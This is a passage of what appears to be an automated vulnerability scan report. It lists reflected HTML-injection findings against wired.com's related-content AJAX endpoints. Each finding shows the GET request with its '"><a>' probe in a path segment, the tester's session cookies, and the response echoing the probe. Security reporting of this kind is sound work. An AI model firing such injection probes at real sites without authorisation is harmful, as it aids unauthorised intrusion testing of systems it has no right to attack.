1.12. http://www.wired.com/ajax/widgets/related/content/blogPost/magazine_39648 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /ajax/widgets/related/content/blogPost/magazine_39648

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6c6a5"><a>1a9008494ce was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ajax/widgets/related6c6a5"><a>1a9008494ce/content/blogPost/magazine_39648 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29390
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Mon, 22 Nov 2010 01:15:13 GMT
Date: Mon, 22 Nov 2010 01:11:13 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_ajax ss_widgets c_related6c6a5"><a>1a9008494ce">
...[SNIP]...

1.13. http://www.wired.com/ajax/widgets/related/content/blogPost/playbook_3021 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /ajax/widgets/related/content/blogPost/playbook_3021

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc70a"><a>3b04f1e36da was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ajaxfc70a"><a>3b04f1e36da/widgets/related/content/blogPost/playbook_3021 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29389
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Mon, 22 Nov 2010 01:14:34 GMT
Date: Mon, 22 Nov 2010 01:10:34 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_ajaxfc70a"><a>3b04f1e36da ss_widgets c_related">
...[SNIP]...

1.14. http://www.wired.com/ajax/widgets/related/content/blogPost/playbook_3021 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /ajax/widgets/related/content/blogPost/playbook_3021

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d30b"><a>fc5601b0c19 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ajax/widgets5d30b"><a>fc5601b0c19/related/content/blogPost/playbook_3021 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29389
Vary: Accept-Encoding
Cache-Control: max-age=236
Expires: Mon, 22 Nov 2010 01:14:53 GMT
Date: Mon, 22 Nov 2010 01:10:57 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_ajax ss_widgets5d30b"><a>fc5601b0c19 c_related">
...[SNIP]...

1.15. http://www.wired.com/ajax/widgets/related/content/blogPost/playbook_3021 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /ajax/widgets/related/content/blogPost/playbook_3021

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f817"><a>9b3c8b9b37f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ajax/widgets/related4f817"><a>9b3c8b9b37f/content/blogPost/playbook_3021 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29389
Vary: Accept-Encoding
Cache-Control: max-age=225
Expires: Mon, 22 Nov 2010 01:15:01 GMT
Date: Mon, 22 Nov 2010 01:11:16 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_ajax ss_widgets c_related4f817"><a>9b3c8b9b37f">
...[SNIP]...

1.16. http://www.wired.com/ajax/widgets/related/content/blogPost/reviews_25843 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /ajax/widgets/related/content/blogPost/reviews_25843

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3c31"><a>f807e40c9a9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ajaxb3c31"><a>f807e40c9a9/widgets/related/content/blogPost/reviews_25843 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29389
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Mon, 22 Nov 2010 01:14:23 GMT
Date: Mon, 22 Nov 2010 01:10:23 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_ajaxb3c31"><a>f807e40c9a9 ss_widgets c_related">
...[SNIP]...

1.17. http://www.wired.com/ajax/widgets/related/content/blogPost/reviews_25843 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /ajax/widgets/related/content/blogPost/reviews_25843

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 310b1"><a>8982e2d5c82 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ajax/widgets310b1"><a>8982e2d5c82/related/content/blogPost/reviews_25843 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29389
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Mon, 22 Nov 2010 01:14:51 GMT
Date: Mon, 22 Nov 2010 01:10:51 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_ajax ss_widgets310b1"><a>8982e2d5c82 c_related">
...[SNIP]...

1.18. http://www.wired.com/ajax/widgets/related/content/blogPost/reviews_25843 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /ajax/widgets/related/content/blogPost/reviews_25843

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2273e"><a>e3e8aa7828e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ajax/widgets/related2273e"><a>e3e8aa7828e/content/blogPost/reviews_25843 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29389
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Mon, 22 Nov 2010 01:15:10 GMT
Date: Mon, 22 Nov 2010 01:11:10 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_ajax ss_widgets c_related2273e"><a>e3e8aa7828e">
...[SNIP]...

1.19. http://www.wired.com/ajax/widgets/related/content/blogPost/threatlevel_20877 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /ajax/widgets/related/content/blogPost/threatlevel_20877

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e10a5"><a>295271ef989 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ajaxe10a5"><a>295271ef989/widgets/related/content/blogPost/threatlevel_20877 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29393
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Mon, 22 Nov 2010 01:14:25 GMT
Date: Mon, 22 Nov 2010 01:10:25 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_ajaxe10a5"><a>295271ef989 ss_widgets c_related">
...[SNIP]...

1.20. http://www.wired.com/ajax/widgets/related/content/blogPost/threatlevel_20877 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /ajax/widgets/related/content/blogPost/threatlevel_20877

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9dffe"><a>cc5a2c835a1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ajax/widgets9dffe"><a>cc5a2c835a1/related/content/blogPost/threatlevel_20877 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29393
Vary: Accept-Encoding
Cache-Control: max-age=235
Expires: Mon, 22 Nov 2010 01:14:45 GMT
Date: Mon, 22 Nov 2010 01:10:50 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_ajax ss_widgets9dffe"><a>cc5a2c835a1 c_related">
...[SNIP]...

1.21. http://www.wired.com/ajax/widgets/related/content/blogPost/threatlevel_20877 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /ajax/widgets/related/content/blogPost/threatlevel_20877

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e38f1"><a>6244b533a3a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ajax/widgets/relatede38f1"><a>6244b533a3a/content/blogPost/threatlevel_20877 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29393
Vary: Accept-Encoding
Cache-Control: max-age=234
Expires: Mon, 22 Nov 2010 01:15:02 GMT
Date: Mon, 22 Nov 2010 01:11:08 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_ajax ss_widgets c_relatede38f1"><a>6244b533a3a">
...[SNIP]...

1.22. http://www.wired.com/ajax/widgets/related/content/blogPost/threatlevel_20913 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /ajax/widgets/related/content/blogPost/threatlevel_20913

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83ec0"><a>87032be8af7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ajax83ec0"><a>87032be8af7/widgets/related/content/blogPost/threatlevel_20913 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29393
Vary: Accept-Encoding
Cache-Control: max-age=230
Expires: Mon, 22 Nov 2010 01:14:06 GMT
Date: Mon, 22 Nov 2010 01:10:16 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_ajax83ec0"><a>87032be8af7 ss_widgets c_related">
...[SNIP]...

1.23. http://www.wired.com/ajax/widgets/related/content/blogPost/threatlevel_20913 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /ajax/widgets/related/content/blogPost/threatlevel_20913

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dfa0d"><a>6a79b0a2118 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ajax/widgetsdfa0d"><a>6a79b0a2118/related/content/blogPost/threatlevel_20913 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29393
Vary: Accept-Encoding
Cache-Control: max-age=220
Expires: Mon, 22 Nov 2010 01:14:31 GMT
Date: Mon, 22 Nov 2010 01:10:51 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_ajax ss_widgetsdfa0d"><a>6a79b0a2118 c_related">
...[SNIP]...

1.24. http://www.wired.com/ajax/widgets/related/content/blogPost/threatlevel_20913 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /ajax/widgets/related/content/blogPost/threatlevel_20913

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ced2f"><a>d31ee7a0ba1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ajax/widgets/relatedced2f"><a>d31ee7a0ba1/content/blogPost/threatlevel_20913 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29393
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Mon, 22 Nov 2010 01:15:08 GMT
Date: Mon, 22 Nov 2010 01:11:08 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_ajax ss_widgets c_relatedced2f"><a>d31ee7a0ba1">
...[SNIP]...

1.25. http://www.wired.com/ajax/widgets/related/content/blogPost/threatlevel_7588 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /ajax/widgets/related/content/blogPost/threatlevel_7588

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload abb42"><a>82cb0a5692c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ajaxabb42"><a>82cb0a5692c/widgets/related/content/blogPost/threatlevel_7588 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29392
Vary: Accept-Encoding
Cache-Control: max-age=237
Expires: Mon, 22 Nov 2010 01:14:27 GMT
Date: Mon, 22 Nov 2010 01:10:30 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_ajaxabb42"><a>82cb0a5692c ss_widgets c_related">
...[SNIP]...

1.26. http://www.wired.com/ajax/widgets/related/content/blogPost/threatlevel_7588 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /ajax/widgets/related/content/blogPost/threatlevel_7588

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97b1b"><a>6f0f8c7e998 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ajax/widgets97b1b"><a>6f0f8c7e998/related/content/blogPost/threatlevel_7588 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29392
Vary: Accept-Encoding
Cache-Control: max-age=225
Expires: Mon, 22 Nov 2010 01:14:41 GMT
Date: Mon, 22 Nov 2010 01:10:56 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_ajax ss_widgets97b1b"><a>6f0f8c7e998 c_related">
...[SNIP]...

1.27. http://www.wired.com/ajax/widgets/related/content/blogPost/threatlevel_7588 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /ajax/widgets/related/content/blogPost/threatlevel_7588

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f606f"><a>222e926617f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

